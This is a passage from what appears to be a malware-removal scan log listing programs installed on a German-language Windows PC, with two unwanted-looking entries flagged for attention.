Freemake Audio Converter Version 1.1.0 (HKLM-x32\...\Freemake Audio Converter_is1) (Version: 1.1.0 - Ellora Assets Corporation)
FUSSBALL MANAGER 11 (HKLM-x32\...\FUSSBALL MANAGER 11) (Version:  - Electronic Arts)
FUSSBALL MANAGER 12 (HKLM-x32\...\FUSSBALL MANAGER 12) (Version: 1.0.0.3 - Electronic Arts)
Galapago (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version:  - Oberon Media)
GameSpy Comrade (HKLM-x32\...\{5F4C776F-8CBD-4C4F-892F-B568ABDD70C8}) (Version: 1.5.0.156 - GameSpy)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Haufe iDesk-Browser (HKLM-x32\...\{0F32914F-A633-4516-B531-7084C8F19F93}) (Version: 10.10.14.0000 - Haufe-Lexware GmbH & Co. KG)
Haufe iDesk-Service (HKLM-x32\...\{27F10580-E040-11DF-8C28-005056B12123}) (Version: 10.10.25.7810 - Haufe)
Heroes of Hellas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}) (Version:  - Oberon Media)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series - Grundlegende Software für das Gerät (HKLM\...\{B2B8577D-EECF-4062-BEB7-A8BE3FD679ED}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Hilfe (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
HP Update (HKLM-x32\...\{85DF2EED-08BC-46FB-90DA-28B0D0A8E8A8}) (Version: 5.003.000.004 - Hewlett-Packard)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
iExplorer 3.3.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant LLC)
iFunbox (v2.8.2414.748), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.8.2414.748 - )
iFunBox 2013 (v3.0.494.416), iFunbox DevTeam (HKLM-x32\...\iFunBox 2013_is1) (Version: v3.0.494.416 - )
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.00.01.1002 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{5A68A656-979F-4168-8795-E2E368AA4DC2}) (Version: 11.2.2.3 - Apple Inc.)
Java 7 Update 51 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417051FF}) (Version: 7.0.510 - Oracle)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
Junk Mail filter update (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
KhalInstallWrapper (Version: 2.00.0000 - Logitech) Hidden
K-Lite Codec Pack 9.3.0 (Basic) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.3.0 - )
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.7 - Acer Inc.)
Lexware buchhalter 2011 (HKLM-x32\...\{2B443CC6-7EBE-43FF-91A8-6AC3B5A085FD}) (Version: 16.30.00.0179 - Haufe-Lexware GmbH & Co.KG)
Lexware Elster (HKLM-x32\...\{C8E00BC8-D619-4081-813A-6B5BCC846534}) (Version: 9.10.00.0041 - Lexware GmbH & Co. KG)
Lexware Info Service (HKLM-x32\...\{15B2BC56-D179-4450-84B9-7A8D7F4CE1B9}) (Version: 2.70.00.0081 - Haufe-Lexware GmbH & Co.KG)
Logitech SetPoint (HKLM-x32\...\{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}) (Version: 4.80 - Logitech)
Macromedia Extension Manager (HKLM-x32\...\{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}) (Version: 1.7.240 - Macromedia, Inc.)
Macromedia Flash 8 (HKLM-x32\...\{2BD5C305-1B27-4D41-B690-7A61172D2FEB}) (Version: 8.00.0000 - Macromedia)
Macromedia Flash 8 Video Encoder (HKLM-x32\...\{8BF2C401-02CE-424D-BC26-6C4F9FB446B6}) (Version: 1.00.0000 - Macromedia)
Macromedia Flash Player 8 (HKLM-x32\...\{885A63EA-382B-4DD4-A755-14809B8557D6}) (Version: 8.0.22.0 - Macromedia)
Macromedia Flash Player 8 Plugin (HKLM-x32\...\{91057632-CA70-413C-B628-2D3CDBBB906B}) (Version: 8.0.22.0 - Macromedia)
MediaShow Espresso (x32 Version: 5.5.1403_23691 - CyberLink Corp.) Hidden
Merriam Websters Spell Jam (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}) (Version:  - Oberon Media)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (x32 Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Default Manager (x32 Version: 2.2.114.0 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Access MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Project MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Project Professional 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Outlook Hotmail Connector 64-Bit (HKLM\...\{95140000-007A-0407-1000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 64-bit (HKLM\...\{95140000-007D-0409-1000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Project Professional 2010 (HKLM\...\Office14.PRJPROR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Mobile Connection Manager (HKLM-x32\...\o2DE) (Version:  - Mobile Connection Manager)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 8.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 8.0 (x86 de)) (Version: 8.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT Redists (Version: 1.0 - Sony Creative Software Inc.) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (x32 Version: 3.1.212.0 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{738BF5C3-AF7B-4BB0-B7EF-E505EFC756BE}) (Version: 3.1.212.0 - Egis Technology Inc.)
MyWinLocker Suite (x32 Version: 3.1.212.0 - Egis Technology Inc.) Hidden
NCDownloader (HKLM-x32\...\{0F44DC3F-6E62-4961-A14B-95323C512F9B}_is1) (Version: 1.0 - Solibo Ltd.) <==== ATTENTION
NhacCuaTui (HKLM-x32\...\{2343FB63-1E8C-4E33-8283-B0078AD79430}) (Version: 1.0.627.0 - NCT Corporation)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.630 - NewTech Infosystems)
NTI Backup Now Standard (x32 Version: 5.1.2.630 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6636 - NewTech Infosystems)
NTI Media Maker 8 (x32 Version: 8.0.12.6636 - NewTech Infosystems) Hidden
NVIDIA PhysX (HKLM-x32\...\{B83FC356-B7C0-441F-8A4D-D71E088E7974}) (Version: 9.09.0428 - NVIDIA Corporation)
Optical Drive Power Management (HKLM-x32\...\{AE09C972-EEB2-4DA5-8090-0FCF54576854}) (Version: 1.01.3007 - Acer Incorporated)
Overlord II (HKLM-x32\...\{E426CEC1-35C5-42BF-913E-6EF8F1211D01}) (Version: 1.0 - Codemasters)
Pando Media Booster (HKLM-x32\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.6.0.9 - Pando Networks Inc.)
PasswordBox (HKLM-x32\...\PasswordBox) (Version: 1.18.0.2194 - PasswordBox, Inc.)
PasswordBox Search (HKCU\...\PasswordBox Search) (Version:  - PasswordBox, Inc.)
Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Transfer App (HKLM-x32\...\com.erclab.air.phototransferapp) (Version: 2.1.0 - UNKNOWN)
Photo Transfer App (x32 Version: 2.1.0 - UNKNOWN) Hidden
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.1 - Nikon)
PlanetSide 2 (HKCU\...\SOE-PlanetSide 2) (Version: 1.0.3.183 - Sony Online Entertainment)
Poker Pop (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111355427}) (Version:  - Oberon Media)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden
QuickSteuer Deluxe 2011 (HKLM-x32\...\{6BCC7669-A863-4C24-804B-9C811C102F71}) (Version: 17.07.00.0001 - Haufe-Lexware GmbH & Co.KG)
QuickSteuer DELUXE Wissens-Center 2011 (HKLM-x32\...\{0ABA2DC3-B67B-4D87-AB1B-EC5E9CDF24B3}) (Version: 17.10.0.0 - Haufe-Lexware GmbH & Co. KG)
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Quyền Vương Online (HKLM-x32\...\{45CCF4CB-EB83-4CE9-9D57-4D95C94A45C9}_is1) (Version: 1.0 - PlayPark.vn)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6096 - Realtek Semiconductor Corp.)
Registry Reviver (HKLM\...\Registry Reviver) (Version: 3.0.1.108 - ReviverSoft LLC)
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Sandbox (HKLM-x32\...\Sandbox) (Version:  - )
savenshAriE (HKLM-x32\...\{62D82EC1-0D3A-DF54-8E3E-07E1337A5311}) (Version: 3.2.0.1537 - savenshAre) <==== ATTENTION
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{DC528101-617D-4E9F-B131-F8F8C52E649B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Shredder (Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Shredder (x32 Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.3.11079 - Skype Technologies S.A.)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
SOE Web Installer (HKCU\...\SOE Web Installer) (Version: 1.0.3.171 - Sony Online Entertainment)
South Park The Stick of Truth - Update 1 version 1.0.1353 (HKLM-x32\...\{83736891-79AE-49BA-96F5-55DD6F2186AC}_is1) (Version: 1.0.1353 - Ubisoft)
Southpark Stick of Truth (HKLM-x32\...\U291dGhwYXJrU3RpY2tvZlRydXRo_is1) (Version: 1 - )
Spin & Win (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110300453}) (Version:  - Oberon Media)
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Star Wars Empire at War Forces of Corruption (HKLM-x32\...\{6592FDEC-2C1A-413A-9985-25FEC2F0848D}) (Version: 1.0 - LucasArts)
Star Wars Jedi Knight Jedi Academy (HKLM-x32\...\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}) (Version:  - )
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
State of Decay - Breakdown (HKLM-x32\...\State of Decay - Breakdown_is1) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Studie zur Verbesserung von HP Photosmart 6510 series Produkten (HKLM\...\{D9710515-1C8F-4AF9-A61D-2E0287915B73}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 14.0.6.0 - Synaptics Incorporated)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.31064 - TeamViewer)
Telerik Control Panel (HKLM-x32\...\{BEB6277E-58FC-48C5-AA2E-D31E07451A9D}) (Version: 14.1.416.0 - Telerik AD)
Telerik JustDecompile Q1 2014 (HKLM-x32\...\{3FEC96B0-93E2-4E59-A7B5-29862E7D3B9D}) (Version: 14.1.225.0 - Telerik AD)
The Forest 1.0 (HKLM-x32\...\The Forest 1.0) (Version: 1.0 - Cat-A-Cat)
Tiny Download Manager (remove only) (HKLM-x32\...\TinyDM) (Version: 2 - TinyDM LTD)
UltraISO Premium V9.52 (HKLM-x32\...\UltraISO_is1) (Version:  - )
UniKey 4.0 RC2 (build 1101) (HKLM-x32\...\{AC006985-A51F-42AC-A7E9-5E66D8AC8063}_is1) (Version:  - Pham Kim Long)
Unity Web Player (All users) (HKLM-x32\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2473228) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2837600) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{17815BC8-062D-49BE-B40C-B54149C85CE3}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{84B191B5-5319-463A-A305-8C4D53B1D20A}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{1AA82E2E-7DB7-4C70-910C-BBB657A6B3A5}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{428CB7A0-1068-4CE1-8835-39C7ECD297ED}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{428CB7A0-1068-4CE1-8835-39C7ECD297ED}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
